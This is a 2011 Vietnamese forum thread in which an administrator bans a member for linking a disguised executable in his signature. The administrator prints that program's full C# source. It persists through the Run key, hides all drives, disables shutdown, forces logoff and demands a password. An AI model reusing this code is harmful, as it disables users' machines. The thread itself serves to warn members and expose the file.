PDA

View Full Version : Xử lý một số thành viên lợi dụng đưa virus lên cộng đồng C Việt



Kevin Hoang
11-05-2011, 10:09 PM
Lợi dụng vào uy tín của cộng đồng C Việt, có một số thành viên đã đưa link tải virus của mình lên diễn đàn thông qua bài viết hoặc chữ ký. Đã trở thành vấn đề bức bách trong công tác quản lý cộng đồng C Việt.

Rất mong các thành viên không click vào các bài viết có chứa link của một file exe, msi, ... nếu không biết chính xác là gì. Hãy liên hệ với ban quản lý, để chúng tôi xác minh cho bạn trước khi tải chúng.

Thành viên huuhung (http://forums.congdongcviet.com/member.php?u=31300)

Lý do: Đưa virus vào chữ ký dưới tên huuhung.rar qua link hxxp://www.mediafire.com/?h2brdpdqvb84r1f. (Có nên tạo cơ hội cho cục phòng chống tội phạm công nghệ cao kiếm thêm không nhỉ?)

Virus này làm cho máy tính tự động tắt máy! Sau đây là source code, được viết bằng ngôn ngữ C#:



using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
using Microsoft.Win32;

namespace test_Registry
{
public class Form1 : Form
{
private string path = "C:\\WINDOWS\\hung.cmd";
private IContainer components = null;
private TextBox textBox1;
public Form1()
{
this.InitializeComponent();
}
public void Read()
{
StreamWriter streamWriter = new StreamWriter(this.path);
streamWriter.WriteLine("shutdown -l -f -t 10");
streamWriter.Close();
Process.Start(this.path);
File.Copy("huuhung.exe", "C:\\WINDOWS\\huuhung.exe", true);
RegistryKey registryKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Poli cies\\Explorer");
registryKey.SetValue("NoDrives", 67108863);
registryKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Poli cies\\system");
registryKey.SetValue("legalnoticecaption", "Bao Dong");
registryKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Poli cies\\system");
registryKey.SetValue("legalnoticetext", "Chao ban! May tinh cua ban gap 1 so van de nho. Cach duy nhat khac phuc tinh trang nay la ban hay nhap vao 'huuhung' trong o textbox. Chuc ban vui ve !");
registryKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Poli cies\\Explorer");
registryKey.SetValue("NoClose", 1);
registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("huuhung", "C:\\WINDOWS\\huuhung.exe");
}
public void DeleteRegistry()
{
try
{
RegistryKey registryKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Poli cies\\Explorer");
registryKey.DeleteValue("NoDrives");
registryKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Poli cies\\system");
registryKey.SetValue("legalnoticecaption", "");
registryKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Poli cies\\system");
registryKey.SetValue("legalnoticetext", "");
registryKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Poli cies\\Explorer");
registryKey.SetValue("NoClose", 0);
}
catch (Exception)
{
}
}
private void textBox1_KeyDown(object sender, KeyEventArgs e)
{
if (e.KeyCode == Keys.Return)
{
if (this.textBox1.Text == "huuhung")
{
File.Delete(this.path);
this.DeleteRegistry();
}
else
{
this.Read();
}
Application.Exit();
}
}
private void Form1_FormClosing(object sender, FormClosingEventArgs e)
{
if (this.textBox1.Text == "huuhung")
{
Application.Exit();
}
else
{
this.Read();
}
Application.Exit();
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
{
this.components.Dispose();
}
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.textBox1 = new TextBox();
base.SuspendLayout();
this.textBox1.Location = new Point(33, 27);
this.textBox1.Name = "textBox1";
this.textBox1.Size = new Size(147, 20);
this.textBox1.TabIndex = 0;
this.textBox1.UseSystemPasswordChar = true;
this.textBox1.KeyDown += new KeyEventHandler(this.textBox1_KeyDown);
base.AutoScaleDimensions = new SizeF(6f, 13f);
base.AutoScaleMode = AutoScaleMode.Font;
base.ClientSize = new Size(213, 96);
base.Controls.Add(this.textBox1);
base.FormBorderStyle = FormBorderStyle.SizableToolWindow;
base.Name = "Form1";
base.StartPosition = FormStartPosition.CenterScreen;
this.Text = "Design by HuuHung";
base.FormClosing += new FormClosingEventHandler(this.Form1_FormClosing);
base.ResumeLayout(false);
base.PerformLayout();
}
}
}

dieucay555
11-05-2011, 10:13 PM
Đúng là trò mèo[:-X)[:-X)[:-X)[:-X)[:-X)[:-X)

zstar
11-05-2011, 10:32 PM
chương trình vớ va vớ vẩn
chán mấy cậu newbie virus học đòi quá

TQN
11-05-2011, 10:35 PM
Mấy cậu newbie, script kiddie mới tập tọe lập trình, nhảy vào với C# ngay. học không lo học, cứ tưởng viết virus là hay !
Em thì thấy từ trước tới giờ, chưa có con virus nào làm em kính nể cả, ngay cả với virus của nhóm Sinh Tử Lệnh.
Chỉ nói một câu: quá bèo.
PS: Sorry anh em, em có tật viết sai hỏi và ngã, từ lớp 9 tới giờ, không sữa được. Bởi vậy đi thi HSG Văn QG mới bị rớt.

hunghuu1990
11-05-2011, 10:40 PM
cái này em chỉ viết test với Registry thui nếu em đã vi phạm thì anh nên nhắc nhỡ em 1 tiếng để em dẹp nó đi. Đằng này anh ko nói 1 câu banned luôn

TQN
11-05-2011, 10:44 PM
Nếu là test thì cậu để trên máy cậu mà test, muốn xóa hết hay format hard disk của cậu cũng được, không ai cấm ! Chứ còn đưa lên mediafire cho người khác, còn newbie hơn cậu download về rồi run do tò mò thì sao ?
Mà là test thì test làm gì mấy cái trò vớ vẫn ấy ?

Kevin Hoang
11-05-2011, 10:45 PM
File tải là file exe, lại để tên link là huuhung.rar là muốn lừa ai hả bạn?
Nếu test tại sao lại đưa vào chữ ký cá nhân ở cộng đồng C Việt là sao đây?

hunghuu1990
11-05-2011, 10:47 PM
tại em mới tìm hiểu về Registry nên thấy hứng thú để làm chữ ký chứ có ý gì đâu.
mà tool đó giống virus lắm sao.
nhưng mà em chỉ thấy uất khi mà anh ko cảnh báo em 1 lời thui. Chứ em có biết post như thế là bị banned đâu
nếu cố tình là virus thì em ngu dại gì để tên huuhung.rar làm gì cho dân chúng nó chữi
mà số bài viết của em cũng 133 bài viết đâu phải tụi newbie mới đăng ký ở CViet vào post tùm bậy
Em chỉ muốn vào đây học hỏi và chia sẽ kiến thức với toàn AE khắp 3 miền thui.

TQN
11-05-2011, 10:48 PM
Tình trạng một số script kiddie lợi dụng CViet mà post virus qua mediafire thì nhiều lắm, em gặp hoài tới phát ngán luôn.
Chỉ khuyên các bạn trước khi run một .exe, một setup package down về từ các trang chia sẽ thì hảy cẩn thận.
Thời buổi bây giờ: Thạch Sanh thì ít, Lý Thông thì nhiều.

Kevin Hoang
11-05-2011, 10:51 PM
Bạn hãy đọc luật lệ tham gia, khi bạn đọc kỹ luật lệ tham gia, hiểu được nguyên tắc tham gia cộng đồng C Việt. Kevin sẽ lift ban tài khoản của bạn trước thời hạn đã ghi.

hunghuu1990
11-05-2011, 11:06 PM
Điều 2: Nghiêm cấm sử dụng thông tin cá nhân có tính không lành mạnh, hoặc liên quan đến tôn giáo - chính trị, hoặc truyền bá văn hóa đồi trụy. Nghiêm cấm sử dụng thông tin cá nhân có chứa địa chỉ website trỏ tới một website có tính không lành mạnh, hoặc liên quan đến tôn giáo - chính trị, hoặc truyền bá văn hóa đồi trụy, hoặc trỏ tới một website có chứa malware.
Em biết lỗi rùi !
tạm thời em xài nick này để theo dõi diễn đàn cũng được.
Xem như đây là bài học của em !

Kevin Hoang
11-05-2011, 11:09 PM
Ok, bạn đã có thái độ tích cực, Kevin đã kiểm tra các bài viết của bạn, cũng không có vấn đề gì. Kevin cũng sẵn sàng lift ban tài khoản của bạn.

Hãy cố gắng phấn đấu vì sự nghiệp bản thân, không nên làm những việc như thế này, ở đây có rất nhiều người có khả năng để biết chương trình của bạn làm gì, có phải là virus không? (Kể cả là bạn viết bằng ngôn ngữ C nhé, cũng có thể đưa cả source code tác giả của tác giả lên cho mọi người xem, chứ không nói gì đến cái thứ virus vớ vẩn bằng C#, VB, hay AutoIT).

nguoirung1.6
15-08-2011, 10:16 PM
Hè hè mình thấy cái này cũng hay (Y:DY)(Y:DY). Phải sống trong môt trường cạnh tranh, nhiều mối đeo dọa thì mới nâng cao dc cảnh giác vào trau dồi kiến thức không sẽ bị loại và ăn hành của người khác. Thấy bác Admin với anh em phản đối kinh quá nhưng mình thì không sao hehe. Ai không tìm hiểu kỹ thì khổ người đó thôi :D.

manhhung1109
17-08-2011, 10:11 AM
Cái source hay nhỉ :) em copy về Run thử xem như nào nhé anh Kevin :D

Kevin Hoang
17-08-2011, 05:42 PM
Bạn huuhung chỉ vì bồng bột, nhất thời mà đã được liệt kê vào đây. Tuy nhiên, huuhung rất đáng được biểu dương về tinh thần, ý thức chia sẻ tại cộng đồng C Việt.

Vì thế, đề tài này chỉ mang tính nhắc nhở, răn đe đối với các thành viên có ý định truyền bá virus, botnet, trojan, ... dựa vào sự uy tín của cộng đồng C Việt.

treatmaster
17-09-2011, 12:08 PM
chuẩn ko cần chỉnh.vote một phát cho anh kevin hehe

md5
19-09-2011, 09:13 AM
Đây là một tội ác. Gây ảnh hưởng &hậu quả nghiêm trọng đến user sau khi download về chạy

rossoneri
19-09-2011, 05:23 PM
đối với người muốn tìm hiểu, chấp nhận download thì mình thấy nó chẳng phải tội ác gì cả

birthis
19-09-2011, 05:27 PM
đối với người muốn tìm hiểu, chấp nhận download thì mình thấy nó chẳng phải tội ác gì cả

Nếu mà đã có tên file là virus.exe hay là miêu tả đó là virut thì không còn là tội ác nữa!

md5
19-09-2011, 05:27 PM
không phải tất cả mọi người đều đang tìm hiểu vius như cậu. chúng tôi đã tìm hiểu để xây dựng, chứ không phá hoại.
Mong bạn hiểu cho
thân
Md5

cchangkhongayngo
19-09-2011, 05:43 PM
Này mấy bạn !

Chuyện đã từ thuở chí kim rồi giờ mà còn nhắc lại nữa....(:-)?

Biết là file *.exe rồi, mà còn download về chạy!!! Ai bảo không cẩn trọng chi!!(:-)$

IT mà chạy exe ko rõ nguồn gốc --> dính chưởng --> rồi nói

Bó chiếu...

rossoneri
19-09-2011, 06:40 PM
không phải tất cả mọi người đều đang tìm hiểu vius như cậu. chúng tôi đã tìm hiểu để xây dựng, chứ không phá hoại.
Mong bạn hiểu cho
thân
Md5

mình không giỏi đến mức nghiên cứu thêm virus, nhưng cái topic này admin đã post code và nói thẳng vào vấn đề file virus của thành viên huuhung mà bạn còn download về thì ráng mà chịu chứ (:-)$

Quangvnu
12-12-2011, 02:36 PM
Bạn hãy đọc luật lệ tham gia, khi bạn đọc kỹ luật lệ tham gia, hiểu được nguyên tắc tham gia cộng đồng C Việt. Kevin sẽ lift ban tài khoản của bạn trước thời hạn đã ghi.

Hoàn toàn ủng hộ anh
(Y:DY)(Y:DY)(Y:DY)(Y:DY)(Y:DY)
Mấy thằng tung Virut nên để hại máy người khác ,cần phải thẳng tay trừng trị những người như vậy